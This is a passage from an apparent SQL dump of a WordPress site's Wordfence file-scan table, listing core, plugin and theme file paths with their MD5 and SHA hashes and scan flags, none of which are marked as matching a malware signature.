(0x9ef78d8aefa9c1c855d15c8f99619045, 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php', 1, 0x00000000000000000000000000000000, 0x9677b895cdb1c0f67230a0ead8853de6, 0x3f45dc25f7eb2b8e9b03841eb1c877810de45edfd6972e24e291690591245b57, '', 0, '?'),
(0x9eff42dc874e80c57f8af2bfa303a467, 'wp-content/themes/Impreza/framework/admin/functions/theme-updater.php', 0, 0x33cd2a65e4baafafbd31b13c32840859, 0x33cd2a65e4baafafbd31b13c32840859, 0x39f64649a5d5c2f0e9c0d1430b9e22c200e4970537bec78d1c9db5a993acccc5, '', 0, '?'),
(0x9f0791fa4b3f67885888a6a82f6bd222, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_printshop_24px.svg', 0, 0xde293e30880ad1028f471a987251da46, 0xde293e30880ad1028f471a987251da46, 0x875dafa88d81d2249f7003f57a3a279043e052908900731279da4c39d71c233f, '', 0, '?'),
(0x9f1c42e2d4e899f421b3b976dda1c9b6, 'wp-content/plugins/wordfence/views/onboarding/banner.php', 1, 0x00000000000000000000000000000000, 0x821386aea5309dcd92a66c008bfe42d6, 0xb22c7b3d230a19bbe44f89f651e1dda55770a259450b5901323e135834c468ab, '', 0, '?'),
(0x9f1d8d7c3b22b4ff5e35b0529ca310b1, 'wp-content/plugins/Ultimate_VC_Addons/templates/ult_tab/single_tab.php', 0, 0x638e6f159ef514041c8f3bc77ee9f4ae, 0x638e6f159ef514041c8f3bc77ee9f4ae, 0x16c86ef652edde200cd561cff39f3c1d5103915dac5764bb9fa0234cc1b97e0c, '', 0, '?'),
(0x9f3c84a028c8eac0892a415d8e4feda0, 'wp-admin/css/colors/ocean/colors-rtl.css', 1, 0x00000000000000000000000000000000, 0x0cf2e52c89e754af7315d139c676b42b, 0x59b050eda3c8f20a0215e1a187b627f098b6c295be2953e7f1279b3b6eb172b1, '', 0, '?'),
(0x9f44b2b8642e50cbb47b1d2d796fd367, 'wp-content/plugins/wordfence/views/common/status-warning.php', 1, 0x00000000000000000000000000000000, 0x6d9466b775d6ba672d14670043d63d76, 0x0817c34e3c0d9f3baafc64b72ad7f4382b29931a01624f3fef3096c945fbc0dd, '', 0, '?'),
(0x9f497c9b4b16390c7fd528d47b73f558, 'wp-content/plugins/wordfence/lib/menu_scanner_credentials.php', 1, 0x00000000000000000000000000000000, 0x66d1668c89883aa9e3d426f42cea5b95, 0x42261224713eec50e90af2cfbe7a8f26c847c03cf936c7b40419bc033a1cb28e, '', 0, '?'),
(0x9f5d465b800eb6e697d845b4c2bf8edc, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_camera_mic_24px.svg', 0, 0x53090bf95e90b68ce7ad457acbe1cd4e, 0x53090bf95e90b68ce7ad457acbe1cd4e, 0x2dc8a570b77af72335d66a2de858eeacabcd85a4da8a8fc55c0124b7b2c73848, '', 0, '?'),
(0x9f6276bec9154592ecb448d5c7e3ce84, 'wp-includes/js/wp-lists.js', 1, 0x00000000000000000000000000000000, 0xcd817551314bafab7fcbee0bac282570, 0xf91a1053a0aac36c9b34759aab6412be8787d7f31f277d25afea9e233915fb25, '', 0, '?'),
(0x9f649048cf7278042262c007198d7639, 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-test-cache.php', 1, 0x00000000000000000000000000000000, 0x215f00e43ecb3382ef1d24f9710250de, 0x4992057cb39cfeef3bf181b79c09a8deaa44d05aa72c43228dcdfe7ead3146c8, '', 0, '?'),
(0x9f6853d1019090c03a0f04b016f6d360, 'wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php', 1, 0x00000000000000000000000000000000, 0x4eb22b0643232b7cf3665aa69d995de5, 0x6b6e1a79e92681e6865fa9d85b83af0b4967076c8328e36705271801ee5eb947, '', 0, '?'),
(0x9f8b8af3747b90c555aca8ae64d020c0, 'wp-content/plugins/js_composer/include/params/gutenberg/gutenberg.php', 0, 0xea5a8761cc351bcfff87627f36b7b01d, 0xea5a8761cc351bcfff87627f36b7b01d, 0xb393ee06947343de61a9e2bf9634e72d7ab8dda5dad5169464b4ff4ad4dcdeaa, '', 0, '?'),
(0x9f9a1065bfcff80570f97d3ec1bc4375, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_single_image.php', 0, 0x8fc1c3d6c98ae18a39a2b8d34c237c11, 0x8fc1c3d6c98ae18a39a2b8d34c237c11, 0xe88eae13d5a99bd7485ccb26d3ea20a4b9f1f9b3e422ec004960eb2a00e72b24, '', 0, '?'),
(0x9fab08c212992e304fb1479e0b834341, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/style_scheme.php', 0, 0xb78ffd6790b2bbbb9b2f5c171c8b7525, 0xb78ffd6790b2bbbb9b2f5c171c8b7525, 0x295b87db72a0d7364bd2d91b0fe855edaca2e8b9c7c2aaf0ec510e93b9321574, '', 0, '?'),
(0x9fce1b9626bfa24ec22cf5a5ef8c3650, 'wp-admin/images/icons32-vs-2x.png', 1, 0x00000000000000000000000000000000, 0xa12a3034ff4734469709265a83697d22, 0xeb2e61fa7d7f858b156877d3369c5745caad9628331def4ad3adb539d30845e5, '', 0, '?'),
(0x9fda0e76bde12371b8f21f19b4c883d9, 'wp-includes/sodium_compat/src/Core32/ChaCha20.php', 1, 0x00000000000000000000000000000000, 0x971e45164f78d99558da32eb96add883, 0x78a8d7614a4ef92165b1acd722224e71ea7de7ab414d43fb3129aeba7b80126a, '', 0, '?'),
(0x9fe0573331a6a94eabb8c467d7a4cace, 'wp-includes/js/dist/vendor/react.min.js', 1, 0x00000000000000000000000000000000, 0xf80458708d0a9701b76d741d35b6722f, 0xc73bfedc44d9f09529c63d4c3a2377b481e73ed24b09fe3c8c7345a763456f15, '', 0, '?'),
(0x9ff160b489a8ca7d8c04e53ddf2a6b54, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_opacity_24px.svg', 0, 0xea1de4517d8e99c8437b11c332e91b78, 0xea1de4517d8e99c8437b11c332e91b78, 0x9149c821b8310bf7f1328963c022fb8e8ed3dd122e30877294b7678805a2f634, '', 0, '?'),
(0x9ff4785bc76584f2b6be3e4d078d0c01, 'wp-admin/includes/edit-tag-messages.php', 1, 0x00000000000000000000000000000000, 0x96d46d2d49e76633180cca665c5a92fd, 0x75b62d0768ee796a4cfff0217aee56c011ba9c2d31df6e79465987c39d822691, '', 0, '?'),
(0xa001681d9020904d28de9faa44189d62, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_toc_24px.svg', 0, 0xe846e5e90a1061443c00a78cca75b7d6, 0xe846e5e90a1061443c00a78cca75b7d6, 0xd71e4dbed0ef03329fd1e12a995233d53be0146a8dd8c2e05c8dc6ea436a07c5, '', 0, '?'),
(0xa001cd10762878a5e29013dcd7f60057, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_play_24px.svg', 0, 0xe0123fbd7a2f4f5412a116885ab14691, 0xe0123fbd7a2f4f5412a116885ab14691, 0x27e1eb41ddefbff824004d2436254f781468c73db94e5955a7d1ea85a0d2b801, '', 0, '?'),
(0xa016c0ce32b4b1d6aef85cf105c6af44, 'wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-add-element-box.php', 0, 0x21dc1137123e8853e73b33e8c29856f2, 0x21dc1137123e8853e73b33e8c29856f2, 0xf8feaab5fb258974ed2dc165e81f8dca9e0a80049a6c06d385c0ea668cf8ef92, '', 0, '?'),
(0xa03b26a86e839104816fa2cea2d0b2d4, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_drive_file_24px.svg', 0, 0x9a0387470e7834439bb279d10eaf74ae, 0x9a0387470e7834439bb279d10eaf74ae, 0x66d0eb16438de934d4036b14c623409bb73062379c2ef96ac9a167cf0a048baf, '', 0, '?'),
(0xa05377a90e0167a276b2d2cbb8f5b7a3, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-ninja-forms.svg', 0, 0xdbd6ce43110bfbf81ed3be07d1c9340c, 0xdbd6ce43110bfbf81ed3be07d1c9340c, 0x97a18e91e255f4edd44c2cc9d95e3dbb0a4db12559650b3167b0acc34aa882de, '', 0, '?'),
(0xa071f2ac68a2f6be4263f8393292ee11, 'wp-admin/network/site-themes.php', 1, 0x00000000000000000000000000000000, 0x70afbd72d9f88b39b917bbbfb3a328ae, 0x579f58fa9085c4bba99d68f714dbf315f75298d74aadecd2a5859364fcf90737, '', 0, '?'),
(0xa07c7a2820a3a6522966ed6aa8f5c8c7, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_gps_not_fixed_24px.svg', 0, 0x3ea87818e4451dd679d951a62f1b6256, 0x3ea87818e4451dd679d951a62f1b6256, 0x5342b6c28d88d8de81f247cb3b8c2b621570eaf15f403d2c0f6e5b4d9594ebe2, '', 0, '?'),
(0xa07eae8fcb2704f221686b035681b748, 'wp-content/plugins/wp-super-cache/rest/load.php', 1, 0x00000000000000000000000000000000, 0xed1171c552a22a331f6deaad710c8107, 0x0687cf486a66e137d297151d2aafccfbc035fd207267cd4e0ffc465f967d00f1, '', 0, '?'),
(0xa0b88b08876025fa927bcdfcd22b9bf3, 'wp-content/plugins/wordfence/images/icons/error128.png', 1, 0x00000000000000000000000000000000, 0xc93ade152513130e37f721c1b4042ed1, 0x7b68002c8e195df37af16b931556ee7bd297a2366e7f470ac003789aa97339ea, '', 0, '?'),
(0xa0be8e7686925c51149ca5c02dbcca17, 'wp-includes/js/tinymce/plugins/hr/plugin.min.js', 1, 0x00000000000000000000000000000000, 0x0911253e82299afa85c2950c033bb68f, 0x0cd88346e4ed53e50c145b6bf5cb03f826fd1f66fd20362ba062b07f3e90a81e, '', 0, '?'),
(0xa0c41d7492ca68bc092c470578a2224d, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php', 1, 0x00000000000000000000000000000000, 0x1dab1ac950ac897d3e928e6a15b1ee20, 0x4d02796180bf981e3b88c211adecc81f1ef33e04a6fdefb31b1cfa701c3a2f66, '', 0, '?'),
(0xa0d6d8c6fb878dbf17ee384092290e27, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/badge01.svg', 0, 0x4c22a2bee4c50bc80091e003b43dbb19, 0x4c22a2bee4c50bc80091e003b43dbb19, 0xdf0a74ba0112aa025504f4d97e6173db0367b009348395e9b21bbf3117bb4ade, '', 0, '?'),
(0xa0dec339985892beb8a255a837a57a13, 'wp-content/plugins/wordfence/models/page/wfPage.php', 1, 0x00000000000000000000000000000000, 0x748a626f20699b254881ba5877cf5876, 0x08c6853168ec8d2f6a77d53c0b5503c08f18945c996bc07125737c57ac36e9e6, '', 0, '?'),
(0xa0e0d196dd71dde453474b0f791828fe, 'wp-includes/kses.php', 1, 0x00000000000000000000000000000000, 0x2f9020522f2b4a8b502db19b64c79ea7, 0xf6c90791804c3c7ed04571c9ea562dfab67d96c819f71c7d3bf84fbc425aac85, '', 0, '?'),
(0xa0e7164e045172d39c343644a19f5465, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/affix.min.js', 0, 0xee228373d4fd12485ec574459a114afc, 0xee228373d4fd12485ec574459a114afc, 0x8cdfe2e197ae7ea178f3e8a24633ba2b4792979a357e27a2afe3458d6aaf679a, '', 0, '?'),
(0xa0ee25e8de591b1f3f2fcdaebd87cad5, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/hotspot.js', 0, 0xa30b8c0e029a6ab5949a384cb415a4b7, 0xa30b8c0e029a6ab5949a384cb415a4b7, 0xa9dcf9bb27a2f94e3038fcaa62920d803d06f173242e0362423d088c2c40f16e, '', 0, '?'),
(0xa0f911d3b5e1b3e7c26e10ead89bde69, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/slider.php', 0, 0x37e4d451a25a2cc4760a252261bae818, 0x37e4d451a25a2cc4760a252261bae818, 0x3e86cb2f927b527f27fa9c51d5c014334ab437aacb1bfa52c1896f6a4b0fa2a9, '', 0, '?'),
(0xa0ff21c426989616ba53578320e63ac8, 'wp-content/themes/Impreza/framework/shortcodes/us_person.php', 0, 0xeb2dc17c7208329c3d8a96ff423226d5, 0xeb2dc17c7208329c3d8a96ff423226d5, 0x2d4468463d1de59d3e9a0dca948b94c1476ef2489d57f6797cb1bea3532827e9, '', 0, '?'),
(0xa11b398dd46cc2d79f3f2072ede871c0, 'wp-includes/class-wp-user-query.php', 1, 0x00000000000000000000000000000000, 0xdc227dbdbf13a473ab16e2d1574a2257, 0xa2697858b0eb4b27a3b97470e66a763ca23bfd97da4a09ca68eaf5203a7ce7a8, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0xa12186f0aedd390090cc7cf77e317e23, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_landscape_24px.svg', 0, 0x3cb943118d4be37c0f157e396de2a7dd, 0x3cb943118d4be37c0f157e396de2a7dd, 0x89bed3ecd9a2bf96de14cecbbb4c282a7faba567bd33e661994bd680438c492b, '', 0, '?'),
(0xa125a5b03f92ea95f514a81129d20f7f, 'wp-content/plugins/wordfence/views/common/section-title.php', 1, 0x00000000000000000000000000000000, 0xa20883775db151a856f7d5b4691e13ab, 0xcdfbf171acfba0722ab7059ac6f82d54b9f8af4e35c50d85d94f633b6d8e61b2, '', 0, '?'),
(0xa14453e6e2e1330f172ec4af797df33b, 'wp-admin/images/browser-rtl.png', 1, 0x00000000000000000000000000000000, 0x442291d9d3a041e41aaefebfbf25cc9d, 0x2be595a7eedbe81e30d6e770cec69cf5984a144d6b20ff71e7770f9c58d8a8a3, '', 0, '?'),
(0xa14fbc65970f47736cc5b07266616cdb, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_chart_24px.svg', 0, 0x2aa635a4d6223a28ac133b9586372bbf, 0x2aa635a4d6223a28ac133b9586372bbf, 0xb90561e68cd3074f3b9488f6de4c3b5f29987ed48d3fe0b4a580963adadbcdc8, '', 0, '?'),
(0xa15bf6486e5b50d62e7ebdf0df46557c, 'wp-includes/nav-menu.php', 1, 0x00000000000000000000000000000000, 0xe6882d1899c29fbf6d9aa864b0ab545d, 0x616d782b02d5a6d477a4d19d2d61d44f03e07dad0a7fd974bd89be2e9c21c944, '', 0, '?'),
(0xa16af0f2975cefc9c4a61c3c79e37083, 'wp-includes/widgets/class-wp-widget-custom-html.php', 1, 0x00000000000000000000000000000000, 0xcbddf4079374ea6a78ce09f70aa5c870, 0x875a60d8c2e1d98e3d7318c92efb3da2045176609f70f5b1e02c23c57d93a7cb, '', 0, '?'),
(0xa18dbbab5a801a780f6379956490f327, 'wp-admin/js/language-chooser.min.js', 1, 0x00000000000000000000000000000000, 0x1e20e39aa9b8414f11608d62414ddd1e, 0xc66712b4f6e1d6259b15de044b73ad3cd05b9283d878533d4b3e5865dd26ae99, '', 0, '?'),
(0xa1ac8725adada85c2877920bbdb7df26, 'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php', 1, 0x00000000000000000000000000000000, 0xfdae49000ed7f2244bf8a6200620f309, 0x56e698701a9e31cd8cd18dcf08273d7ef19b91d9b2130cfb465f755cc1d050e5, '', 0, '?'),
(0xa1b2a8e680cb3a7806d9fd3de17d8804, 'wp-includes/js/jquery/ui/mouse.min.js', 1, 0x00000000000000000000000000000000, 0xb317c4ccc9aa140339ad72fa27c77266, 0xc4f2dfcffb00d5c6264249b672b3ea8f6826eeee4642fd573390d3705e627c8e, '', 0, '?'),
(0xa1c28128ccfe3fadd7b91228c14351e6, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_movie_creation_24px.svg', 0, 0x967c3ea5f614c6046501643abbcdd855, 0x967c3ea5f614c6046501643abbcdd855, 0x9cec58dc63cc1aaa1999338bf88de3562e0fbd184d28ad94c4e539724cbe9469, '', 0, '?'),
(0xa1c8b942663c0cde380b5a20e4f586fa, 'wp-content/cache/supercache/index.html', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0xa1cd0e84b1003871a8cf617430e69b91, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_bike_24px.svg', 0, 0x64beea8cc8ff1b39931d425674c5396d, 0x64beea8cc8ff1b39931d425674c5396d, 0x8f83d27cd92a2701536cb85a7921a5c5e0622894223fa135689cf16152db9151, '', 0, '?'),
(0xa1cf030c0846400fbfa479f15a1b3dac, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_connected_24px.svg', 0, 0x539141d5a8c2292f877e78148f614615, 0x539141d5a8c2292f877e78148f614615, 0x819efc9da16dba9c8f769948e0315cc8924bac97fce7a3dc5ae508efa6d2b998, '', 0, '?'),
(0xa1d7c78d7a875ce481a1bab81f87db42, 'wp-content/plugins/revslider/admin/assets/imports/contenttabs/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0xa1d848e9618c2bf5a7adadccb00b49b1, 'wp-content/plugins/wordfence/waf/bootstrap.php', 1, 0x00000000000000000000000000000000, 0x5a180ebc85f9e23e3836579377d7209c, 0x1956b6d5cb5111cef8c0f9d45ce871a43b3dce027f9a103cff1f8b4a413e46e4, '', 0, '?'),
(0xa1ea79ee1326619241a037c25d0e446d, 'wp-content/plugins/wordfence/images/icons/ajaxRed16.gif', 1, 0x00000000000000000000000000000000, 0xb4cfe025babba9420a670fa03285893b, 0x14442c85411c141da34ac0edc083bb6c4f0853827f1c70a265d887a326aadac6, '', 0, '?'),
(0xa1fa3fd79029617a8c7aaec54a85c552, 'wp-content/plugins/Ultimate_VC_Addons/admin/js/dualbtnbackend.js', 0, 0x43d0ad5d41b6160c20215c26a5b0d757, 0x43d0ad5d41b6160c20215c26a5b0d757, 0xe1b7a96f078e10fb52146de6bba4166ab5e3737ae43107d9127fbdb50fb9bb07, '', 0, '?'),
(0xa206c69ed7851a58aa585dc159c90b46, 'wp-includes/js/codemirror/htmlhint.js', 1, 0x00000000000000000000000000000000, 0xb532ec7cd19faf478c4d740b5035a7ea, 0x010055065b00f74d276d43d5bc35fed035176b60f9aaf1e90e35f1d191057f11, '', 0, '?'),
(0xa20a933557d51a4c5c7488f33fead1db, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_zoom_out_24px.svg', 0, 0x146c09540c71707bec9a17cfffa3ad32, 0x146c09540c71707bec9a17cfffa3ad32, 0x07f2a754bd7e453e3b3425294e21fe69b4651f77917d3570ba3bd46e68dc1152, '', 0, '?'),
(0xa214729bdbf49d3e15febee3fde35e38, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/ihover.js', 0, 0xbaa3c76c550d23b5ce727ac287864c31, 0xbaa3c76c550d23b5ce727ac287864c31, 0x53e5252f56e4292396b353cbd8c618a66043158e44bc02ba1e5e9b6c49e5937a, '', 0, '?'),
(0xa2206110224b77541b06d50e62633153, 'wp-admin/css/revisions.css', 1, 0x00000000000000000000000000000000, 0x41615f8d0cbede34b5ced529fe9e5e7f, 0xed2eea194d3eaca005ecd2256724fb10972860fd665080e42b2f4317577b2579, '', 0, '?'),
(0xa22d895b6970f99c055c5e98d8f3c15d, 'wp-includes/widgets/class-wp-widget-tag-cloud.php', 1, 0x00000000000000000000000000000000, 0xd6a6c12f26ac1682e9d4a90f8ed1c229, 0x63632d1956a0a56f1a493c318e4b614468d706e89c42ce7a32b9a37fe5f69fae, '', 0, '?'),
(0xa230e1c126a559a9eed51ca0d513c1a1, 'wp-content/plugins/wordfence/vendor/composer/LICENSE', 1, 0x00000000000000000000000000000000, 0x955d5fe58c231244f6b49000f383b5e2, 0x1a209ff8db92f625a713347e4ed97e47682162d817ad3a77829805c98cbf9927, '', 0, '?'),
(0xa23467818c651fcad8e93ea9f3d3df9d, 'wp-admin/images/list-2x.png', 1, 0x00000000000000000000000000000000, 0x68d5bb134953c23217fdd36982679a0c, 0xf97fee4afc70e1535ff2af0bd41058d8d8238e89058f5542d92d7ad4d4c42ce7, '', 0, '?'),
(0xa23bb966a04a31f8facb981db7802b43, 'wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php', 1, 0x00000000000000000000000000000000, 0xa900ab12103c91a8ee8a5efdb03dee66, 0x735dd1bd6a24ac8909a0a5e2869c01d1e3feb8ba87bfa4536b1116ece2696bb8, '', 0, '?'),
(0xa243ceb3133b73baa0cf73565d9b5ea6, 'wp-content/plugins/js_composer/include/autoload/hook-vc-iconpicker-param.php', 0, 0x3321b4eb03115e013ffc83382b9ebf59, 0x3321b4eb03115e013ffc83382b9ebf59, 0x131eb8d604c4be1cd8a154ea7cbf6c73ba672e1c0719f512bc94c69115d4772b, '', 0, '?'),
(0xa24f4f7754e04d0dd2c19d5914982164, 'wp-includes/js/mediaelement/mediaelement.min.js', 1, 0x00000000000000000000000000000000, 0x2890d236e5e44496f045916182f54d0d, 0xd45538a9ce3268bed6504798f7724bd2c68c1538ba31060c45a18e9a210b875a, '', 0, '?'),
(0xa2522359d80f44beafb233c86a937dbc, 'wp-content/plugins/Ultimate_VC_Addons/admin/js/jquery.minicolors.min.js', 0, 0x40a7978d992231e59293fd7e95bb80cb, 0x40a7978d992231e59293fd7e95bb80cb, 0x1a3cfaa06f3cd6cd009bd5ef72e5002e27b4c7fb83f19926f2a61bad938cac31, '', 0, '?'),
(0xa256acff89462afef84705af8ba980fc, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/satellite-dish.svg', 0, 0xf1d96d4f67a6c246b02e2d5ac67ededa, 0xf1d96d4f67a6c246b02e2d5ac67ededa, 0x5615d7a68ca65468bb694b668d2bd705c25c7deaec368e455e1479dd9e32191a, '', 0, '?'),
(0xa25d1cc7bf7ca0b4e114f6bea64943f4, 'wp-includes/js/dist/keycodes.js', 1, 0x00000000000000000000000000000000, 0x48fd05b4c2627f3d3a48cfb98ed91356, 0x7a04bfef1af141722f0242394dbce911fad62bd357e83285d8c3edd8db17a7eb, '', 0, '?'),
(0xa2666b6a9212c24e89556569343d25c3, 'wp-admin/js/tags.min.js', 1, 0x00000000000000000000000000000000, 0xb0934f29dd7066a46581e8e3e260610b, 0x7464244ca71e8cfb548ee359e641c9df8ad3635834083a4de0f3001bcde7eea5, '', 0, '?'),
(0xa277e4590054438a8a1167f0ef0dbf9d, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-chart.svg', 0, 0xe157728cfbeee2e08a15232f3ed0371a, 0xe157728cfbeee2e08a15232f3ed0371a, 0xdb77454d8d309a8d9370abd54caf4b48e4ed88d7b3945fd0f89ac9c2ee22e814, '', 0, '?'),
(0xa2792585cbc6c7ba7e10b96e657f2256, 'wp-admin/css/list-tables-rtl.css', 1, 0x00000000000000000000000000000000, 0x84dec80acc4755197100bfa80edf7d19, 0x547c12ace2face639255989be5f391ab7dece0d027a770cdc307d6ec8687e17c, '', 0, '?'),
(0xa2a967fc02f11561ee86cf73dca734d3, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_bottom_24px.svg', 0, 0x47ff1665808ae1c9988b185be5bc1376, 0x47ff1665808ae1c9988b185be5bc1376, 0xb677c7ffabcfe6b862abbfc03a0780445ec8270384dc88ff010fe09cf38e9cea, '', 0, '?'),
(0xa2b4b82fcf2d95540ec7bbfa543c9753, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php', 1, 0x00000000000000000000000000000000, 0xf0802d7f870d8b755aa8453aca0985f3, 0xace8e11cbb5eb83c04111d3174973eb1c0a8d2534d135f11ef33a86b21ff24ce, '', 0, '?'),
(0xa2c9dfd7e3c85f5a6ccdad8eaf7a9760, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop.svg', 0, 0x1becbb5018c7cf6f5defda7ca41e0da5, 0x1becbb5018c7cf6f5defda7ca41e0da5, 0xd3a2aeba397fcf5cea4dcf8faad29c9180fd1d4433d0e8394d10fb8b5138ac25, '', 0, '?'),
(0xa2ed6c91fdf014ae3c4badbbc65b1008, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_cake_24px.svg', 0, 0x26bf6da01acd463a873eb632cb4f605c, 0x26bf6da01acd463a873eb632cb4f605c, 0x1961331798e7176b5753eee9aac8e541a1bd4d5c339d0c01065ec6b984889748, '', 0, '?'),
(0xa3029850f00b4608ad5df771e3df4eb9, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_airplay_24px.svg', 0, 0xd525fdf70414625d76348d7f8a292b0d, 0xd525fdf70414625d76348d7f8a292b0d, 0x3bc179448eb94e4648ef93d4701a4554f679b1e510629aad32b91b9c88325fee, '', 0, '?'),
(0xa3032429885ff421655dff058c197890, 'wp-content/plugins/js_composer/include/autoload/vc-pointers-frontend-editor.php', 0, 0x64c1aa7d6ead3f74b170d6bf464bca22, 0x64c1aa7d6ead3f74b170d6bf464bca22, 0xfa167cd21c799b84a8622144b45f2e6f3bab0e30775dc17f04ddd03488504a67, '', 0, '?'),
(0xa3271b1b7bea80090a0f8fa191672d7d, 'wp-content/themes/Impreza/framework/shortcodes/us_cta.php', 0, 0xbbe5acd7ff8a0feb26e23d92d37bab91, 0xbbe5acd7ff8a0feb26e23d92d37bab91, 0xda53a01ce86c44c1d8cf6af7782696823354b386577755a96e4f529c651f46db, '', 0, '?'),
(0xa331e06f1425a8c00471c5031541b580, 'wp-admin/js/inline-edit-post.min.js', 1, 0x00000000000000000000000000000000, 0xab9800198ab0358fee9eb0f20f8c439d, 0xd6179ca3aaa5a21d2a6b84789511c48b43c49aa9cf1d2b6961b8e0335fb2799f, '', 0, '?'),
(0xa34a984c87b881889e8d127064711e97, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_3_bar_24px.svg', 0, 0x47e023d2fbcb49e8d691a7892fd00f45, 0x47e023d2fbcb49e8d691a7892fd00f45, 0x151ec15302eb21dae7e757b56e69b68e7d9a43918ca64f90a6425cd083cb5b54, '', 0, '?'),
(0xa3544c20eadf882c5dbdacd5a6866d81, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php', 1, 0x00000000000000000000000000000000, 0x389109a481a2bdbb3a7b80e457f3ea65, 0x367b77f7bbb50c5e470b6baeceabc33235ddfa6293f3840de4ddf193ab84e688, '', 0, '?'),
(0xa36df148c43aa74ddcce11ed2a9c8b5e, 'wp-includes/css/dist/editor/editor-styles.css', 1, 0x00000000000000000000000000000000, 0x8977b727a799ed3a59692b81e46302fe, 0x8049590001b9bf081bf6c2311273589109766143acbf480c86e214dedeaf39ce, '', 0, '?'),
(0xa373b77b0ed2ad94d3c0c9e5f2470211, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/loadmode.js', 0, 0xe9082cfbad2713724646c44e7afcf177, 0xe9082cfbad2713724646c44e7afcf177, 0x1afc1862ec75badcad1e6ce992397ac007c0f8be78d3d0a05a50e59f42eedc24, '', 0, '?'),
(0xa37ab26839e6c7ea88a6c4ca5870882b, 'wp-content/plugins/wordfence/views/scanner/no-issues.php', 1, 0x00000000000000000000000000000000, 0x78742d7cf846defd8ea8d0d1e98565aa, 0xc9d75f3f37cbf1dc63f58caf3a5f089806d240a88bc345db4a899f73a9b05b18, '', 0, '?'),
(0xa38d9ea476bd88855635c783de44c575, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php', 1, 0x00000000000000000000000000000000, 0x9cda840b9d0aba3110b768cdbe2102dc, 0xb34d0bcfa1e71109de13fea51ea870ab6bf216c429afabe2c7210d1b880cbd17, '', 0, '?'),
(0xa39a45f653d4632b04dff12308ba1b29, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php', 1, 0x00000000000000000000000000000000, 0x75d21d4e6d8553e1ed94d443dbd27be7, 0xfcd80cd40e10507e9d7b70d510d47d787bd4381190328d681f58f678c5c1bb88, '', 0, '?'),
(0xa3c5bc3eff2638d862c2b329bde52cd9, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_verified_user_24px.svg', 0, 0x7c28affa733024df72c20ca77b116a81, 0x7c28affa733024df72c20ca77b116a81, 0x9ece8903285a76efa30e6fcc247a9eccee0c203e7bd6dd592c4e6b9f2eef9f51, '', 0, '?'),
(0xa3c93f5a3bcd7a1d89503004438471cd, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_underlined_24px.svg', 0, 0x045b417ca606314893f5b43ba43e1cc0, 0x045b417ca606314893f5b43ba43e1cc0, 0x93f597d04af60ffe04285409255f94e433a174d29017ccebe235233089313cf3, '', 0, '?'),
(0xa3dc0346a6b2998d987b0f90ecb4fd41, 'wp-content/plugins/wordfence/lib/sysinfo.php', 1, 0x00000000000000000000000000000000, 0xdb8def51ea85b3f9c2f69d39d311ddfc, 0x1c0821f34423442230d67ae8741536f0db7f491048d4865cdedcc030cc881a64, '', 0, '?'),
(0xa3ed9145e2e2ed95c0513fe8de0928c4, 'wp-includes/class-oembed.php', 1, 0x00000000000000000000000000000000, 0x69c249a3b7f32a0174da2375a300c580, 0x499115349b61216ebf0d5069657b2fd3b3f9d99a239c18a47726ec6a046684c2, '', 0, '?'),
